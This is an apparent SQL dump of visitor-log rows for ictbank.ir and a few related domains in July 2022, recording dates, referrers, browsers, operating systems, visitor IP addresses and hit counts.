(22407,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.250.19.242','000',0,2,0),
(22408,'2022-07-07','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','212.102.33.244','000',0,2,0),
(22409,'2022-07-07','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','212.102.33.247','000',0,2,0),
(22410,'2022-07-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','120.41.45.194','000',0,3,0),
(22411,'2022-07-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.99.3.216','000',0,2,0),
(22412,'2022-07-07','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','212.102.33.36','000',0,2,0),
(22413,'2022-07-07','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','212.102.33.250','000',0,2,0),
(22414,'2022-07-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,4,0),
(22415,'2022-07-07','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','84.17.48.75','000',0,15,0),
(22416,'2022-07-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','119.90.42.82','000',0,1,0),
(22417,'2022-07-07','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.122','000',0,3,0),
(22418,'2022-07-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22419,'2022-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,2,0),
(22420,'2022-07-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22421,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(22422,'2022-07-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','193.92.182.236','000',0,2,0),
(22423,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.133.237','000',0,1,0),
(22424,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.69.142','000',0,2,0),
(22425,'2022-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22426,'2022-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22427,'2022-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22428,'2022-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22429,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(22430,'2022-07-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.29','000',0,2,0),
(22431,'2022-07-07','https://www.bing.com','Chrome','OS X','10.9.2',NULL,NULL,'','13.76.132.231','000',0,3,0),
(22432,'2022-07-07','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','178.174.175.70','000',0,1,0),
(22433,'2022-07-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.53','000',0,1,0),
(22434,'2022-07-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.57','000',0,5,0),
(22435,'2022-07-07','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.43','000',0,1,0),
(22436,'2022-07-07','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,1,0),
(22437,'2022-07-07','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.112','000',0,1,0),
(22438,'2022-07-07','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.26.182.26','000',0,1,0),
(22439,'2022-07-07','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,2,0),
(22440,'2022-07-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(22441,'2022-07-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.95.17.68','000',0,1,0),
(22442,'2022-07-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22443,'2022-07-08','http://www.design-arena.ir/blog','Chrome','Android','6.0',NULL,NULL,'','124.221.186.82','000',0,5,0),
(22444,'2022-07-08','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.248.249','000',0,1,0),
(22445,'2022-07-08','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.70.176','000',0,1,0),
(22446,'2022-07-08','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.165.87.96','000',0,1,0),
(22447,'2022-07-08','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,7,0),
(22448,'2022-07-08','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.165.87.105','000',0,1,0),
(22449,'2022-07-08','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','140.224.65.55','000',0,1,0),
(22450,'2022-07-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.106','000',0,2,0),
(22451,'2022-07-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22452,'2022-07-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22453,'2022-07-08','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.26.182.26','000',0,3,0),
(22454,'2022-07-08','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.43','000',0,1,0),
(22455,'2022-07-08','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.222','000',0,1,0),
(22456,'2022-07-08','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,1,0),
(22457,'2022-07-08','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,1,0),
(22458,'2022-07-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(22459,'2022-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.182.219','000',0,1,0),
(22460,'2022-07-08','http://www.ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','124.221.230.151','000',0,1,0),
(22461,'2022-07-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.184.148.162','000',0,1,0),
(22462,'2022-07-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','47.74.231.7','000',0,1,0),
(22463,'2022-07-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.97','000',0,2,0),
(22464,'2022-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(22465,'2022-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(22466,'2022-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22467,'2022-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22468,'2022-07-08','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','103.218.241.151','000',0,1,0),
(22469,'2022-07-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(22470,'2022-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.241','000',0,2,0),
(22471,'2022-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.12','000',0,2,0),
(22472,'2022-07-09','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','50.31.21.5','000',0,2,0),
(22473,'2022-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.141.55.252','000',0,1,0),
(22474,'2022-07-09','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.112','000',0,3,0),
(22475,'2022-07-09','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,1,0),
(22476,'2022-07-09','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.26.182.26','000',0,2,0),
(22477,'2022-07-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(22478,'2022-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.71','000',0,2,0),
(22479,'2022-07-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','44.236.207.248','000',0,2,0),
(22480,'2022-07-09','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.128.111.36','000',0,1,0),
(22481,'2022-07-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(22482,'2022-07-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22483,'2022-07-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22484,'2022-07-09','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,6,0),
(22485,'2022-07-09','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','192.3.215.74','000',0,11,0),
(22486,'2022-07-09','http://www.ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','23.94.81.240','000',0,2,0),
(22487,'2022-07-09','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','20.46.244.96','000',0,8,0),
(22488,'2022-07-09','http://wikisonnati.com/blog','Firefox','Windows','10.0',NULL,NULL,'','137.184.148.162','000',0,2,0),
(22489,'2022-07-09','http://82.102.9.14/','Firefox','Windows','10.0',NULL,NULL,'','96.44.143.78','000',0,2,0),
(22490,'2022-07-09','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.71.0.136','000',0,1,0),
(22491,'2022-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.99','000',0,4,0),
(22492,'2022-07-09','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,2,0),
(22493,'2022-07-09','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.122','000',0,1,0),
(22494,'2022-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22495,'2022-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22496,'2022-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22497,'2022-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(22498,'2022-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22499,'2022-07-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22500,'2022-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.12.99.107','000',0,1,0),
(22501,'2022-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22502,'2022-07-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22503,'2022-07-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,7,0),
(22504,'2022-07-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','144.217.71.170','000',0,2,0),
(22505,'2022-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.99','000',0,4,0),
(22506,'2022-07-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22507,'2022-07-10','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.225','000',0,1,0),
(22508,'2022-07-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22509,'2022-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(22510,'2022-07-10','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','185.158.115.77','000',0,13,0),
(22511,'2022-07-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22512,'2022-07-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.103','000',0,2,0),
(22513,'2022-07-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22514,'2022-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22515,'2022-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,2,0),
(22516,'2022-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22517,'2022-07-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','20.125.120.101','000',0,17,0),
(22518,'2022-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22519,'2022-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.100.8.204','000',0,1,0),
(22520,'2022-07-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22521,'2022-07-11','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,4,0),
(22522,'2022-07-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(22523,'2022-07-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22524,'2022-07-11','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','51.103.208.30','000',0,2,0),
(22525,'2022-07-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22526,'2022-07-11','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','100.27.45.74','000',0,1,0),
(22527,'2022-07-11','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','80.67.10.139','000',0,3,0),
(22528,'2022-07-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(22529,'2022-07-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.236.147.154','000',0,2,0),
(22530,'2022-07-11','http://wikisonnati.com/blog','Firefox','Windows','10.0',NULL,NULL,'','45.55.33.36','000',0,4,0),
(22531,'2022-07-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22532,'2022-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22533,'2022-07-11','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','126.15.9.107','000',0,1,0),
(22534,'2022-07-11','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22535,'2022-07-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.18','000',0,2,0),
(22536,'2022-07-11','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','45.227.255.38','000',0,5,0),
(22537,'2022-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.99','000',0,4,0),
(22538,'2022-07-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','159.223.133.23','000',0,2,0),
(22539,'2022-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.245.103','000',0,1,0),
(22540,'2022-07-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.38','000',0,1,0),
(22541,'2022-07-11','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22542,'2022-07-11','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','181.214.218.74','000',0,1,0),
(22543,'2022-07-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.24','000',0,1,0),
(22544,'2022-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22545,'2022-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(22546,'2022-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22547,'2022-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22548,'2022-07-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(22549,'2022-07-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(22550,'2022-07-11','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','209.141.46.123','000',0,2,0),
(22551,'2022-07-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,2,0),
(22552,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.250','000',0,2,0),
(22553,'2022-07-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,9,0),
(22554,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.198.74.6','000',0,1,0),
(22555,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22556,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.34','000',0,7,0),
(22558,'2022-07-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22559,'2022-07-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22560,'2022-07-12','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.42','000',0,2,0),
(22561,'2022-07-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','181.214.218.50','000',0,1,0),
(22562,'2022-07-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,4,0),
(22563,'2022-07-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22564,'2022-07-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','5.255.99.205','000',0,1,0),
(22565,'2022-07-12','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.139','000',0,2,0),
(22566,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.75.161','000',0,1,0),
(22567,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.248.186.112','000',0,1,0),
(22568,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.100','000',0,6,0),
(22569,'2022-07-12','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','54.179.15.201','000',0,3,0),
(22570,'2022-07-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(22571,'2022-07-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','195.123.241.30','000',0,18,0),
(22572,'2022-07-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','195.123.240.173','000',0,11,0),
(22573,'2022-07-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.3.94.166','000',0,2,0),
(22574,'2022-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(22575,'2022-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,2,0),
(22576,'2022-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22577,'2022-07-12','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(22578,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.103','000',0,2,0),
(22579,'2022-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(22580,'2022-07-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,7,0),
(22581,'2022-07-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,4,0),
(22582,'2022-07-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22583,'2022-07-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','120.41.45.194','000',0,1,0),
(22584,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22585,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22586,'2022-07-13','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22587,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.100','000',0,8,0),
(22588,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.97','000',0,4,0),
(22589,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.236.21.180','000',0,1,0),
(22590,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.103','000',0,4,0),
(22591,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.106','000',0,2,0),
(22592,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','221.11.227.155','000',0,11,0),
(22593,'2022-07-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22594,'2022-07-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','195.123.241.30','000',0,10,0),
(22595,'2022-07-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','195.123.240.173','000',0,3,0),
(22596,'2022-07-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22597,'2022-07-13','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','111.13.63.69','000',0,1,0),
(22598,'2022-07-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.136','000',0,2,0),
(22599,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(22600,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.36','000',0,2,0),
(22601,'2022-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(22602,'2022-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.127.43','000',0,1,0),
(22603,'2022-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(22604,'2022-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.182.190.98','000',0,2,0),
(22605,'2022-07-13','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.231.252','000',0,1,0),
(22606,'2022-07-14','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','208.80.194.122','000',0,6,0),
(22607,'2022-07-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,8,0),
(22608,'2022-07-14','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','197.63.114.191','000',0,1,0),
(22609,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.71','000',0,2,0),
(22610,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.119.81.106','000',0,6,0),
(22611,'2022-07-14','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22612,'2022-07-14','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.238','000',0,1,0),
(22613,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.46','000',0,1,0),
(22614,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.119.81.100','000',0,10,0),
(22615,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.97','000',0,7,0),
(22616,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.239.179.84','000',0,2,0),
(22617,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.103','000',0,4,0),
(22618,'2022-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22619,'2022-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.5','000',0,2,0),
(22620,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,4,0),
(22621,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,2,0),
(22622,'2022-07-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','44.236.207.248','000',0,1,0),
(22623,'2022-07-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22624,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.245.37','000',0,1,0),
(22625,'2022-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.64.108.205','000',0,1,0),
(22626,'2022-07-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22627,'2022-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(22628,'2022-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.144.195','000',0,1,0),
(22629,'2022-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22630,'2022-07-14','http://ictbank.ir/blog','Safari','OS X','Unknown',NULL,NULL,'','119.90.52.34','000',0,2,0),
(22631,'2022-07-14','http://ictbank.ir/blog','Android Browser','Android','8.0.0',NULL,NULL,'','149.57.161.118','000',0,2,0),
(22632,'2022-07-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22633,'2022-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(22634,'2022-07-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','209.216.93.82','000',0,2,0),
